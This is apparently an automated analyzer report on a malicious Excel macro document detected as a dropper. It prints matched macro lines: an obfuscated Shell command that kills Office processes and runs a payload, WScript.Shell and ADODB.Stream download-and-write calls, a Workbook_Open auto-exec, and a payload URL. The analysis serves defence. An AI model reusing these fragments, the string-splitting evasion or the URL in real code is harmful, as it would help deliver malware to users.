Malicious Office (OOXML) — malware analysis report

Heuristics 11

• ClamAV: Doc.Dropper.Agent-6516028-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6516028-0
• VBA project inside OOXML medium 8 related findings OOXML_VBA
  Document contains a VBA project — VBA macros present
• Potential Shell call in VBA critical OLE_VBA_SHELL
  Potential Shell call in VBA
  Matched line in script

  Shell ("c" + "m" + "d /c p" + "i" + "n" + "g -n 3 localhost & i" + "p" + "c" + "o" + "n" + "f" + "ig/release & ipconfig/release & ipconfig/release & ping -n 3 localhost & t" + "a" + "s" + "k" + "k" + "i" + "l" + "l /f /im w" + "i" + "n" + "w" + "o" + "r" + "d" + "." + "e" + "x" + "e & task" + "kill /f /im e" + "x" + "c" + "e" + "l" + "." + "e" + "x" + "e & " & Obj1 & " & ping -n 3 localhost & exit"), vbHide '11

• WScript.Shell usage critical OLE_VBA_WSCRIPT
  WScript.Shell usage
  Matched line in script

  Set wso = CreateObject("WScript.Shell")

• VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script

  .write Obj3.responseBody '8

• Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
  VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  Matched line in script

  Set wso = CreateObject("WScript.Shell")

• CreateObject call high OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script

  Set wso = CreateObject("WScript.Shell")

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
• Workbook_Open macro low OLE_VBA_WBOPEN
  Workbook_Open macro
  Matched line in script

  Private Sub Workbook_Open()

• Environ() call (env variable access) low OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script

  tp1 = Environ$("P" + "u" + "b" + "l" + "i" + "c")

• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://stevemike-fireforce.info/work/exe/3.doc Referenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.